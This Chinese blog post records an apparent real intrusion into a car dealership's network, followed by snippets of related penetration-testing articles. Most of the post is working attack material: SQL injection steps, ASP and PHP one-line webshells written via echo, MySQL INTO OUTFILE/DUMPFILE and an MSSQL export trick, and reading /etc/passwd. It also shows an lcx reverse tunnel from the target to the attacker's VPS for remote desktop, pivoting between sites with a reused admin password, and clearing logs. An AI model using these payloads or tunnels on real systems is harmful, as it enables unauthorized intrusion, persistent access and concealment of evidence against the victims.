内网渗透记实

key:sa 、 os-shell 、 上传、回显
1.sqlinj
1.1 查看当前用户和当前库
1.2 查看用户相关的表,查找管理员帐号相关信息,加盐的密码,且盐加密

2.os-shell (当然可借用xp_cmd)
#找路径
dir c:\
dir d:\  #木有D盘,别放弃
dir E:\
#定位到路径
dir E:\sainuoNew\

3.getshell
#找到路径写shell,有两种方法,一种直接echo(要结合^);一种是sql语句备份的那种(MSSQL)
#echo 直接写入,只要权限够,就可以;遇到狗另说
echo ^<%eval request("360") %^>

#sql语句,mysql与mssql 不同
mysql:注意要转成十六进制(密码a)
and 1=2 union select 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile ‘/alidata/www/cms/ttbdxt/conf.php‘--= //注入语句
select 0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into DUMPFILE ‘E:/XXX/php.php‘;  //利用dumpfileshell
#mysql sql-shell 查看文件内容
select load_file(‘/etc/passwd‘)

mysql:
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php eval($_POST[cmd]);?>‘);
select cmd from a into outfile ‘x:/phpMyAdmin/libraries/d.php‘;
Drop TABLE IF EXISTS a;

mssql:
create table cmd (a varchar(50))
insert into cmd (a) values (‘<%eval request("hat")%>‘)
select * into [a] in ‘E:\sainuoNew\x.asp;x.xls‘ ‘excel 4.0;‘ from cmd
drop table cmd
直接菜刀里连接http://www.xxx.cc/x.asp;x.xls一句话 密码是hat

4.远控
windows 2003 ,不知道是否开了3389
思路:利用socks代理来全局代理搞内容进一步渗透100那台机器,但没成果,所以换了思路用lcx 反弹3389,后来得知管理员自定义修改了远程端口为2000
4.1 osshell 要在kali下进行,会更好的回显,否则windows会乱码
4.2 在osshell 中定位远程桌面的端口
tasklist /svc | findstr TermService   找到远程桌面服务对应的pid
然后根据pid找对应的端口
netstat -ano | grep pidnum

4.3 利用lcx进行反向反弹
#本次菜刀不能执行命令,利用菜刀上传lcx(看运气),上传getpass或mimicatz 获得当前用户的密码或者cmd创建高管,但本次有狗不能加入管理员组
在自己的VPS 上运行: lcx -listen 2222 3333
在目标机器上运行  : lcx -slave 119.75.217.56 2222 127.0.0.1 3389  (本次渗透其实是2000端口)
这样远程连接自己VPS的3333端口就能控制目标机器的远程桌面了

5.远控目标

远控是为了渗透100雪弗兰的网站。有安全狗,不能扫描,不能传马,所以通过101别克的网站进行的远控连接。administrator密码同

6.清空日志

看看自己想要的数据以及bak。清空日志say bye.

时间: 2024-10-14 11:56:26

内网渗透记实的相关文章

内网渗透常用手法

作者:凋凌玫瑰来源:NCPH 内网,很多人应该形成了这个概念,很多大型网络的外部网站或是服务器不一定有用,当然外网也是一个突破口.很多时候我们直接从外网入手,随着安 全的不断加固,已变得越来越困难.那么黑客通常是怎么进行内网渗透的,内网渗透又是怎样与社会工程学联系起来呢,今天主要描述黑客内网渗透的常用操作手 法,关于如何获得内网机器,请查找我以前的一篇文章<内网渗透—如何打开突破口>. 渗透的过程就是一个信息刺探.利用.思考.突破的过程.首先在我们获得一台内网的机器后应该怎么做,当然是信息刺探

内网渗透+基础+工具使用=自己理解

目录 1.代理 2.内网命令 3.抓密码 4.ipc$共享目录利用 5.端口漏洞 6.溢出 1.代理 端口转发工具有很多比如:rebind2  eDuh  ssock  reDuh  lcx  socks5 等--.. 下面介绍我比较喜欢的2款工具LCX+ socks5 1.lcx 路由器加端口 TCP协议 ,固定IP地址本机 大马设置 Local Ip : 转发ip Local Port : 转发端口 Remote Ip :本机ip (ip138.com外网ip) Remote Port :

内网渗透思路

Sky's自留地 关注互联网安全,关注安全&攻击技术. 搜索关键字搜索 首页申请链接 内网渗透测试思路[转自网络] 作者: sky 孵化于: March 15, 2015 家属: 学习类,技术类 访问: 2,136 次 写在前面渗透测试是门技术,也是一门艺术.这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样:但是在这个过程中,思路无疑是最重要的,没有做不到只有想不到,就跟咱们高中解题时有了思路就迎刃而解一样,手里拿着铲子(技巧

记录一次坎坷的linux内网渗透过程瞎折腾的坑

写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux  2.6.32-358  cpu 架构(x86_64)AND发行版 Red Hat Enterprise Linux Server release 6.4 2.DMZ+防火墙+行为监控,外网开放8080 8084 ... 3.服务器有utibadn用户的权限一枚 Shell具体怎么拿到的就不说了,记录下自己比较思路坎坷的一次内网渗透以作回顾: 外网nmap得到

内网渗透学习

在乌云看到了这篇文章,看的我太爽了. 从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备  披露状态: 2015-02-18: 细节已通知厂商并且等待厂商处理中2015-02-27: 厂商已经确认,细节仅向厂商公开2015-03-09: 细节向核心白帽子及相关领域专家公开2015-03-19: 细节向普通白帽子公开2015-03-29: 细节向实习白帽子公开2015-04-04: 细节向公众公开 简要描述: 本来打算发人人网的,但是苦逼的是我刚进去内网就貌似被t出来了,服务器直接宕了,等

安天实战课题研究2017年第二期内网渗透技术题目

安天实战课题研究2017年第二期内网渗透技术题目拟研究以下题目:1.使用NTScan扫描内网Windows口令(已经完成)2.使用Hscan进行内网口令扫描 (已经完成)3.扫描Mysql口令 (已经完成)4.扫描MSSQL口令 (已经完成)5.使用SQLTools查看SQL Server数据库及提权 (已经完成)6.内网信息收集工具7.内网信息自动收集脚本8.内网密码获取工具9.服务器明文密码及hash获取10.Windows及Linux密码哈希破解11.远程终端使用攻略 (已经完成)12.记

浅谈内网渗透

引子离上篇文章的时间过去很久了,答应写一篇内网渗透的文章,今天抽点时间,把这个坑给添平了吧.标题是浅谈,所以我不认为自己能在内网渗透写的有多深入.渗透这玩意更多是经验,积累的多了自然水到渠成.而且我个人认为很多前辈人物都已经写的很好了,我这里纯粹抛砖引玉,把前辈级人物的经验集成在一起,也算基础篇吧.如果有不足的地方或者有更好的实现方法,欢迎随时交流.交流方式就以邮件吧,邮件地址在文章结束处,上次公开的Q加了很多人,即时通讯=即时打扰,过段时间集中清理,如果不小心被清理了,诸位勿怪,这里算是提前打

内网渗透测试思路-FREEBUF

(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接. ① Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行 探测的. I: 不具备系统权限: ①  Ser

(原创)校园卡破解系列三(完结篇)---内网渗透

上午大课间十几分钟搞定! 在班上电脑  因为内网渗透 先看看本地ip  172.18.33.38 然后就想着扫一下网段  随手输了172.18.32.0-172.18.33.0 扫内网端口的工具挺多的  最顺手其实是kali里面用msf一个模块扫 那个能直接爆破一些端口 但是考虑到班上电脑xp的辣鸡机子 而且时间不允许 所以直接写个php来扫内网端口也就是如图的 13.php 下载个phpstudy+这个文件  5分钟搞定 扫完就第一眼看到 172.18.32.5开了个8000端口  下意识猜测